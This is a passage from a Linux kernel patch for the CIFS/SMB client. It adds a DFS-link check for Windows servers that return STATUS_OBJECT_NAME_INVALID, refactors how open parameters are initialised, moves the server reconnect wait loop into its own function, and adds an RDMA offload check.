+ 		       NULL, NULL);
+diff --git a/fs/cifs/misc.c b/fs/cifs/misc.c
+index 2a19c7987c5bd..ae0679f0c0d25 100644
+--- a/fs/cifs/misc.c
++++ b/fs/cifs/misc.c
+@@ -21,6 +21,7 @@
+ #include "cifsfs.h"
+ #ifdef CONFIG_CIFS_DFS_UPCALL
+ #include "dns_resolve.h"
++#include "dfs_cache.h"
+ #endif
+ #include "fs_context.h"
+ #include "cached_dir.h"
+@@ -1300,4 +1301,70 @@ int cifs_update_super_prepath(struct cifs_sb_info *cifs_sb, char *prefix)
+ 	cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_USE_PREFIX_PATH;
+ 	return 0;
+ }
++
++/*
++ * Handle weird Windows SMB server behaviour. It responds with
++ * STATUS_OBJECT_NAME_INVALID code to SMB2 QUERY_INFO request for
++ * "\<server>\<dfsname>\<linkpath>" DFS reference, where <dfsname> contains
++ * non-ASCII unicode symbols.
++ */
++int cifs_inval_name_dfs_link_error(const unsigned int xid,
++				   struct cifs_tcon *tcon,
++				   struct cifs_sb_info *cifs_sb,
++				   const char *full_path,
++				   bool *islink)
++{
++	struct cifs_ses *ses = tcon->ses;
++	size_t len;
++	char *path;
++	char *ref_path;
++
++	*islink = false;
++
++	/*
++	 * Fast path - skip check when @full_path doesn't have a prefix path to
++	 * look up or tcon is not DFS.
++	 */
++	if (strlen(full_path) < 2 || !cifs_sb ||
++	    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS) ||
++	    !is_tcon_dfs(tcon) || !ses->server->origin_fullpath)
++		return 0;
++
++	/*
++	 * Slow path - tcon is DFS and @full_path has prefix path, so attempt
++	 * to get a referral to figure out whether it is an DFS link.
++	 */
++	len = strnlen(tcon->tree_name, MAX_TREE_SIZE + 1) + strlen(full_path) + 1;
++	path = kmalloc(len, GFP_KERNEL);
++	if (!path)
++		return -ENOMEM;
++
++	scnprintf(path, len, "%s%s", tcon->tree_name, full_path);
++	ref_path = dfs_cache_canonical_path(path + 1, cifs_sb->local_nls,
++					    cifs_remap(cifs_sb));
++	kfree(path);
++
++	if (IS_ERR(ref_path)) {
++		if (PTR_ERR(ref_path) != -EINVAL)
++			return PTR_ERR(ref_path);
++	} else {
++		struct dfs_info3_param *refs = NULL;
++		int num_refs = 0;
++
++		/*
++		 * XXX: we are not using dfs_cache_find() here because we might
++		 * end filling all the DFS cache and thus potentially
++		 * removing cached DFS targets that the client would eventually
++		 * need during failover.
++		 */
++		if (ses->server->ops->get_dfs_refer &&
++		    !ses->server->ops->get_dfs_refer(xid, ses, ref_path, &refs,
++						     &num_refs, cifs_sb->local_nls,
++						     cifs_remap(cifs_sb)))
++			*islink = refs[0].server_type == DFS_TYPE_LINK;
++		free_dfs_info_array(refs, num_refs);
++		kfree(ref_path);
++	}
++	return 0;
++}
+ #endif
+diff --git a/fs/cifs/smb1ops.c b/fs/cifs/smb1ops.c
+index 4cb364454e130..abda6148be10f 100644
+--- a/fs/cifs/smb1ops.c
++++ b/fs/cifs/smb1ops.c
+@@ -576,14 +576,15 @@ static int cifs_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
+ 		if (!(le32_to_cpu(fi.Attributes) & ATTR_REPARSE))
+ 			return 0;
+ 
+-		oparms.tcon = tcon;
+-		oparms.cifs_sb = cifs_sb;
+-		oparms.desired_access = FILE_READ_ATTRIBUTES;
+-		oparms.create_options = cifs_create_options(cifs_sb, 0);
+-		oparms.disposition = FILE_OPEN;
+-		oparms.path = full_path;
+-		oparms.fid = &fid;
+-		oparms.reconnect = false;
++		oparms = (struct cifs_open_parms) {
++			.tcon = tcon,
++			.cifs_sb = cifs_sb,
++			.desired_access = FILE_READ_ATTRIBUTES,
++			.create_options = cifs_create_options(cifs_sb, 0),
++			.disposition = FILE_OPEN,
++			.path = full_path,
++			.fid = &fid,
++		};
+ 
+ 		/* Need to check if this is a symbolic link or not */
+ 		tmprc = CIFS_open(xid, &oparms, &oplock, NULL);
+@@ -823,14 +824,15 @@ smb_set_file_info(struct inode *inode, const char *full_path,
+ 		goto out;
+ 	}
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = SYNCHRONIZE | FILE_WRITE_ATTRIBUTES;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = full_path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = SYNCHRONIZE | FILE_WRITE_ATTRIBUTES,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.path = full_path,
++		.fid = &fid,
++	};
+ 
+ 	cifs_dbg(FYI, "calling SetFileInfo since SetPathInfo for times not supported by this server\n");
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+@@ -998,15 +1000,16 @@ cifs_query_symlink(const unsigned int xid, struct cifs_tcon *tcon,
+ 		goto out;
+ 	}
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.create_options = cifs_create_options(cifs_sb,
+-						    OPEN_REPARSE_POINT);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = full_path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.create_options = cifs_create_options(cifs_sb,
++						      OPEN_REPARSE_POINT),
++		.disposition = FILE_OPEN,
++		.path = full_path,
++		.fid = &fid,
++	};
+ 
+ 	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+ 	if (rc)
+@@ -1115,15 +1118,16 @@ cifs_make_node(unsigned int xid, struct inode *inode,
+ 
+ 	cifs_dbg(FYI, "sfu compat create special file\n");
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_WRITE;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR |
+-						    CREATE_OPTION_SPECIAL);
+-	oparms.disposition = FILE_CREATE;
+-	oparms.path = full_path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_WRITE,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR |
++						      CREATE_OPTION_SPECIAL),
++		.disposition = FILE_CREATE,
++		.path = full_path,
++		.fid = &fid,
++	};
+ 
+ 	if (tcon->ses->server->oplocks)
+ 		oplock = REQ_OPLOCK;
+diff --git a/fs/cifs/smb2inode.c b/fs/cifs/smb2inode.c
+index 8521adf9ce790..9b956294e8643 100644
+--- a/fs/cifs/smb2inode.c
++++ b/fs/cifs/smb2inode.c
+@@ -105,14 +105,15 @@ static int smb2_compound_op(const unsigned int xid, struct cifs_tcon *tcon,
+ 		goto finished;
+ 	}
+ 
+-	vars->oparms.tcon = tcon;
+-	vars->oparms.desired_access = desired_access;
+-	vars->oparms.disposition = create_disposition;
+-	vars->oparms.create_options = cifs_create_options(cifs_sb, create_options);
+-	vars->oparms.fid = &fid;
+-	vars->oparms.reconnect = false;
+-	vars->oparms.mode = mode;
+-	vars->oparms.cifs_sb = cifs_sb;
++	vars->oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = desired_access,
++		.disposition = create_disposition,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.fid = &fid,
++		.mode = mode,
++		.cifs_sb = cifs_sb,
++	};
+ 
+ 	rqst[num_rqst].rq_iov = &vars->open_iov[0];
+ 	rqst[num_rqst].rq_nvec = SMB2_CREATE_IOV_SIZE;
+@@ -526,12 +527,13 @@ int smb2_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
+ 			 struct cifs_sb_info *cifs_sb, const char *full_path,
+ 			 struct cifs_open_info_data *data, bool *adjust_tz, bool *reparse)
+ {
+-	int rc;
+ 	__u32 create_options = 0;
+ 	struct cifsFileInfo *cfile;
+ 	struct cached_fid *cfid = NULL;
+ 	struct kvec err_iov[3] = {};
+ 	int err_buftype[3] = {};
++	bool islink;
++	int rc, rc2;
+ 
+ 	*adjust_tz = false;
+ 	*reparse = false;
+@@ -579,15 +581,15 @@ int smb2_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
+ 					      SMB2_OP_QUERY_INFO, cfile, NULL, NULL,
+ 					      NULL, NULL);
+ 			goto out;
+-		} else if (rc != -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) &&
+-			   hdr->Status == STATUS_OBJECT_NAME_INVALID) {
+-			/*
+-			 * Handle weird Windows SMB server behaviour. It responds with
+-			 * STATUS_OBJECT_NAME_INVALID code to SMB2 QUERY_INFO request
+-			 * for "\<server>\<dfsname>\<linkpath>" DFS reference,
+-			 * where <dfsname> contains non-ASCII unicode symbols.
+-			 */
+-			rc = -EREMOTE;
++		} else if (rc != -EREMOTE && hdr->Status == STATUS_OBJECT_NAME_INVALID) {
++			rc2 = cifs_inval_name_dfs_link_error(xid, tcon, cifs_sb,
++							     full_path, &islink);
++			if (rc2) {
++				rc = rc2;
++				goto out;
++			}
++			if (islink)
++				rc = -EREMOTE;
+ 		}
+ 		if (rc == -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) && cifs_sb &&
+ 		    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS))
+diff --git a/fs/cifs/smb2ops.c b/fs/cifs/smb2ops.c
+index e6bcd2baf446a..c7f8dba5a855a 100644
+--- a/fs/cifs/smb2ops.c
++++ b/fs/cifs/smb2ops.c
+@@ -729,12 +729,13 @@ smb3_qfs_tcon(const unsigned int xid, struct cifs_tcon *tcon,
+ 	struct cifs_fid fid;
+ 	struct cached_fid *cfid = NULL;
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
+ 
+ 	rc = open_cached_dir(xid, tcon, "", cifs_sb, false, &cfid);
+ 	if (rc == 0)
+@@ -771,12 +772,13 @@ smb2_qfs_tcon(const unsigned int xid, struct cifs_tcon *tcon,
+ 	struct cifs_open_parms oparms;
+ 	struct cifs_fid fid;
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open(xid, &oparms, &srch_path, &oplock, NULL, NULL,
+ 		       NULL, NULL);
+@@ -794,7 +796,6 @@ static int
+ smb2_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
+ 			struct cifs_sb_info *cifs_sb, const char *full_path)
+ {
+-	int rc;
+ 	__le16 *utf16_path;
+ 	__u8 oplock = SMB2_OPLOCK_LEVEL_NONE;
+ 	int err_buftype = CIFS_NO_BUFFER;
+@@ -802,6 +803,8 @@ smb2_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
+ 	struct kvec err_iov = {};
+ 	struct cifs_fid fid;
+ 	struct cached_fid *cfid;
++	bool islink;
++	int rc, rc2;
+ 
+ 	rc = open_cached_dir(xid, tcon, full_path, cifs_sb, true, &cfid);
+ 	if (!rc) {
+@@ -816,12 +819,13 @@ smb2_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
+ 	if (!utf16_path)
+ 		return -ENOMEM;
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL,
+ 		       &err_iov, &err_buftype);
+@@ -830,15 +834,17 @@ smb2_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
+ 
+ 		if (unlikely(!hdr || err_buftype == CIFS_NO_BUFFER))
+ 			goto out;
+-		/*
+-		 * Handle weird Windows SMB server behaviour. It responds with
+-		 * STATUS_OBJECT_NAME_INVALID code to SMB2 QUERY_INFO request
+-		 * for "\<server>\<dfsname>\<linkpath>" DFS reference,
+-		 * where <dfsname> contains non-ASCII unicode symbols.
+-		 */
+-		if (rc != -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) &&
+-		    hdr->Status == STATUS_OBJECT_NAME_INVALID)
+-			rc = -EREMOTE;
++
++		if (rc != -EREMOTE && hdr->Status == STATUS_OBJECT_NAME_INVALID) {
++			rc2 = cifs_inval_name_dfs_link_error(xid, tcon, cifs_sb,
++							     full_path, &islink);
++			if (rc2) {
++				rc = rc2;
++				goto out;
++			}
++			if (islink)
++				rc = -EREMOTE;
++		}
+ 		if (rc == -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) && cifs_sb &&
+ 		    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS))
+ 			rc = -EOPNOTSUPP;
+@@ -1097,13 +1103,13 @@ smb2_set_ea(const unsigned int xid, struct cifs_tcon *tcon,
+ 	rqst[0].rq_iov = open_iov;
+ 	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+ 
+-	memset(&oparms, 0, sizeof(oparms));
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_WRITE_EA;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_WRITE_EA,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open_init(tcon, server,
+ 			    &rqst[0], &oplock, &oparms, utf16_path);
+@@ -1453,12 +1459,12 @@ smb2_ioctl_query_info(const unsigned int xid,
+ 	rqst[0].rq_iov = &vars->open_iov[0];
+ 	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+ 
+-	memset(&oparms, 0, sizeof(oparms));
+-	oparms.tcon = tcon;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, create_options);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.fid = &fid,
++	};
+ 
+ 	if (qi.flags & PASSTHRU_FSCTL) {
+ 		switch (qi.info_type & FSCTL_DEVICE_ACCESS_MASK) {
+@@ -2088,12 +2094,13 @@ smb3_notify(const unsigned int xid, struct file *pfile,
+ 	}
+ 
+ 	tcon = cifs_sb_master_tcon(cifs_sb);
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL, NULL,
+ 		       NULL);
+@@ -2159,12 +2166,13 @@ smb2_query_dir_first(const unsigned int xid, struct cifs_tcon *tcon,
+ 	rqst[0].rq_iov = open_iov;
+ 	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES | FILE_READ_DATA,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = fid,
++	};
+ 
+ 	rc = SMB2_open_init(tcon, server,
+ 			    &rqst[0], &oplock, &oparms, utf16_path);
+@@ -2490,12 +2498,13 @@ smb2_query_info_compound(const unsigned int xid, struct cifs_tcon *tcon,
+ 	rqst[0].rq_iov = open_iov;
+ 	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = desired_access;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = desired_access,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open_init(tcon, server,
+ 			    &rqst[0], &oplock, &oparms, utf16_path);
+@@ -2623,12 +2632,13 @@ smb311_queryfs(const unsigned int xid, struct cifs_tcon *tcon,
+ 	if (!tcon->posix_extensions)
+ 		return smb2_queryfs(xid, tcon, cifs_sb, buf);
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open(xid, &oparms, &srch_path, &oplock, NULL, NULL,
+ 		       NULL, NULL);
+@@ -2916,13 +2926,13 @@ smb2_query_symlink(const unsigned int xid, struct cifs_tcon *tcon,
+ 	rqst[0].rq_iov = open_iov;
+ 	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+ 
+-	memset(&oparms, 0, sizeof(oparms));
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, create_options);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, create_options),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open_init(tcon, server,
+ 			    &rqst[0], &oplock, &oparms, utf16_path);
+@@ -3056,13 +3066,13 @@ smb2_query_reparse_tag(const unsigned int xid, struct cifs_tcon *tcon,
+ 	rqst[0].rq_iov = open_iov;
+ 	rqst[0].rq_nvec = SMB2_CREATE_IOV_SIZE;
+ 
+-	memset(&oparms, 0, sizeof(oparms));
+-	oparms.tcon = tcon;
+-	oparms.desired_access = FILE_READ_ATTRIBUTES;
+-	oparms.disposition = FILE_OPEN;
+-	oparms.create_options = cifs_create_options(cifs_sb, OPEN_REPARSE_POINT);
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.disposition = FILE_OPEN,
++		.create_options = cifs_create_options(cifs_sb, OPEN_REPARSE_POINT),
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open_init(tcon, server,
+ 			    &rqst[0], &oplock, &oparms, utf16_path);
+@@ -3196,17 +3206,20 @@ get_smb2_acl_by_path(struct cifs_sb_info *cifs_sb,
+ 		return ERR_PTR(rc);
+ 	}
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = READ_CONTROL;
+-	oparms.disposition = FILE_OPEN;
+-	/*
+-	 * When querying an ACL, even if the file is a symlink we want to open
+-	 * the source not the target, and so the protocol requires that the
+-	 * client specify this flag when opening a reparse point
+-	 */
+-	oparms.create_options = cifs_create_options(cifs_sb, 0) | OPEN_REPARSE_POINT;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = READ_CONTROL,
++		.disposition = FILE_OPEN,
++		/*
++		 * When querying an ACL, even if the file is a symlink
++		 * we want to open the source not the target, and so
++		 * the protocol requires that the client specify this
++		 * flag when opening a reparse point
++		 */
++		.create_options = cifs_create_options(cifs_sb, 0) |
++				  OPEN_REPARSE_POINT,
++		.fid = &fid,
++	};
+ 
+ 	if (info & SACL_SECINFO)
+ 		oparms.desired_access |= SYSTEM_SECURITY;
+@@ -3265,13 +3278,14 @@ set_smb2_acl(struct cifs_ntsd *pnntsd, __u32 acllen,
+ 		return rc;
+ 	}
+ 
+-	oparms.tcon = tcon;
+-	oparms.desired_access = access_flags;
+-	oparms.create_options = cifs_create_options(cifs_sb, 0);
+-	oparms.disposition = FILE_OPEN;
+-	oparms.path = path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.desired_access = access_flags,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.disposition = FILE_OPEN,
++		.path = path,
++		.fid = &fid,
++	};
+ 
+ 	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL,
+ 		       NULL, NULL);
+@@ -5134,15 +5148,16 @@ smb2_make_node(unsigned int xid, struct inode *inode,
+ 
+ 	cifs_dbg(FYI, "sfu compat create special file\n");
+ 
+-	oparms.tcon = tcon;
+-	oparms.cifs_sb = cifs_sb;
+-	oparms.desired_access = GENERIC_WRITE;
+-	oparms.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR |
+-						    CREATE_OPTION_SPECIAL);
+-	oparms.disposition = FILE_CREATE;
+-	oparms.path = full_path;
+-	oparms.fid = &fid;
+-	oparms.reconnect = false;
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_WRITE,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR |
++						      CREATE_OPTION_SPECIAL),
++		.disposition = FILE_CREATE,
++		.path = full_path,
++		.fid = &fid,
++	};
+ 
+ 	if (tcon->ses->server->oplocks)
+ 		oplock = REQ_OPLOCK;
+diff --git a/fs/cifs/smb2pdu.c b/fs/cifs/smb2pdu.c
+index 2c9ffa921e6f6..23926f754d2aa 100644
+--- a/fs/cifs/smb2pdu.c
++++ b/fs/cifs/smb2pdu.c
+@@ -139,6 +139,66 @@ out:
+ 	return;
+ }
+ 
++static int wait_for_server_reconnect(struct TCP_Server_Info *server,
++				     __le16 smb2_command, bool retry)
++{
++	int timeout = 10;
++	int rc;
++
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus != CifsNeedReconnect) {
++		spin_unlock(&server->srv_lock);
++		return 0;
++	}
++	timeout *= server->nr_targets;
++	spin_unlock(&server->srv_lock);
++
++	/*
++	 * Return to caller for TREE_DISCONNECT and LOGOFF and CLOSE
++	 * here since they are implicitly done when session drops.
++	 */
++	switch (smb2_command) {
++	/*
++	 * BB Should we keep oplock break and add flush to exceptions?
++	 */
++	case SMB2_TREE_DISCONNECT:
++	case SMB2_CANCEL:
++	case SMB2_CLOSE:
++	case SMB2_OPLOCK_BREAK:
++		return -EAGAIN;
++	}
++
++	/*
++	 * Give demultiplex thread up to 10 seconds to each target available for
++	 * reconnect -- should be greater than cifs socket timeout which is 7
++	 * seconds.
++	 *
++	 * On "soft" mounts we wait once. Hard mounts keep retrying until
++	 * process is killed or server comes back on-line.
++	 */
++	do {
++		rc = wait_event_interruptible_timeout(server->response_q,
++						      (server->tcpStatus != CifsNeedReconnect),
++						      timeout * HZ);
++		if (rc < 0) {
++			cifs_dbg(FYI, "%s: aborting reconnect due to received signal\n",
++				 __func__);
++			return -ERESTARTSYS;
++		}
++
++		/* are we still trying to reconnect? */
++		spin_lock(&server->srv_lock);
++		if (server->tcpStatus != CifsNeedReconnect) {
++			spin_unlock(&server->srv_lock);
++			return 0;
++		}
++		spin_unlock(&server->srv_lock);
++	} while (retry);
++
++	cifs_dbg(FYI, "%s: gave up waiting on reconnect\n", __func__);
++	return -EHOSTDOWN;
++}
++
+ static int
+ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 	       struct TCP_Server_Info *server)
+@@ -146,7 +206,6 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 	int rc = 0;
+ 	struct nls_table *nls_codepage;
+ 	struct cifs_ses *ses;
+-	int retries;
+ 
+ 	/*
+ 	 * SMB2s NegProt, SessSetup, Logoff do not have tcon yet so
+@@ -184,61 +243,11 @@ smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
+ 	    (!tcon->ses->server) || !server)
+ 		return -EIO;
+ 
+-	ses = tcon->ses;
+-	retries = server->nr_targets;
+-
+-	/*
+-	 * Give demultiplex thread up to 10 seconds to each target available for
+-	 * reconnect -- should be greater than cifs socket timeout which is 7
+-	 * seconds.
+-	 */
+-	while (server->tcpStatus == CifsNeedReconnect) {
+-		/*
+-		 * Return to caller for TREE_DISCONNECT and LOGOFF and CLOSE
+-		 * here since they are implicitly done when session drops.
+-		 */
+-		switch (smb2_command) {
+-		/*
+-		 * BB Should we keep oplock break and add flush to exceptions?
+-		 */
+-		case SMB2_TREE_DISCONNECT:
+-		case SMB2_CANCEL:
+-		case SMB2_CLOSE:
+-		case SMB2_OPLOCK_BREAK:
+-			return -EAGAIN;
+-		}
+-
+-		rc = wait_event_interruptible_timeout(server->response_q,
+-						      (server->tcpStatus != CifsNeedReconnect),
+-						      10 * HZ);
+-		if (rc < 0) {
+-			cifs_dbg(FYI, "%s: aborting reconnect due to a received signal by the process\n",
+-				 __func__);
+-			return -ERESTARTSYS;
+-		}
+-
+-		/* are we still trying to reconnect? */
+-		spin_lock(&server->srv_lock);
+-		if (server->tcpStatus != CifsNeedReconnect) {
+-			spin_unlock(&server->srv_lock);
+-			break;
+-		}
+-		spin_unlock(&server->srv_lock);
+-
+-		if (retries && --retries)
+-			continue;
++	rc = wait_for_server_reconnect(server, smb2_command, tcon->retry);
++	if (rc)
++		return rc;
+ 
+-		/*
+-		 * on "soft" mounts we wait once. Hard mounts keep
+-		 * retrying until process is killed or server comes
+-		 * back on-line
+-		 */
+-		if (!tcon->retry) {
+-			cifs_dbg(FYI, "gave up waiting on reconnect in smb_init\n");
+-			return -EHOSTDOWN;
+-		}
+-		retries = server->nr_targets;
+-	}
++	ses = tcon->ses;
+ 
+ 	spin_lock(&ses->chan_lock);
+ 	if (!cifs_chan_needs_reconnect(ses, server) && !tcon->need_reconnect) {
+@@ -3898,7 +3907,7 @@ void smb2_reconnect_server(struct work_struct *work)
+ 		goto done;
+ 
+ 	/* allocate a dummy tcon struct used for reconnect */
+-	tcon = kzalloc(sizeof(struct cifs_tcon), GFP_KERNEL);
++	tcon = tconInfoAlloc();
+ 	if (!tcon) {
+ 		resched = true;
+ 		list_for_each_entry_safe(ses, ses2, &tmp_ses_list, rlist) {
+@@ -3921,7 +3930,7 @@ void smb2_reconnect_server(struct work_struct *work)
+ 		list_del_init(&ses->rlist);
+ 		cifs_put_smb_ses(ses);
+ 	}
+-	kfree(tcon);
++	tconInfoFree(tcon);
+ 
+ done:
+ 	cifs_dbg(FYI, "Reconnecting tcons and channels finished\n");
+@@ -4054,6 +4063,36 @@ SMB2_flush(const unsigned int xid, struct cifs_tcon *tcon, u64 persistent_fid,
+ 	return rc;
+ }
+ 
++#ifdef CONFIG_CIFS_SMB_DIRECT
++static inline bool smb3_use_rdma_offload(struct cifs_io_parms *io_parms)
++{
++	struct TCP_Server_Info *server = io_parms->server;
++	struct cifs_tcon *tcon = io_parms->tcon;
++
++	/* we can only offload if we're connected */
++	if (!server || !tcon)
++		return false;
++
++	/* we can only offload on an rdma connection */
++	if (!server->rdma || !server->smbd_conn)
++		return false;
++
++	/* we don't support signed offload yet */
++	if (server->sign)
++		return false;
++
++	/* we don't support encrypted offload yet */
++	if (smb3_encryption_required(tcon))
++		return false;
++
++	/* offload also has its overhead, so only do it if desired */
++	if (io_parms->length < server->smbd_conn->rdma_readwrite_threshold)
++		return false;
++
++	return true;
++}
++#endif /* CONFIG_CIFS_SMB_DIRECT */
++
+ /*
+  * To form a chain of read requests, any read requests after the first should
+  * have the end_of_chain boolean set to true.
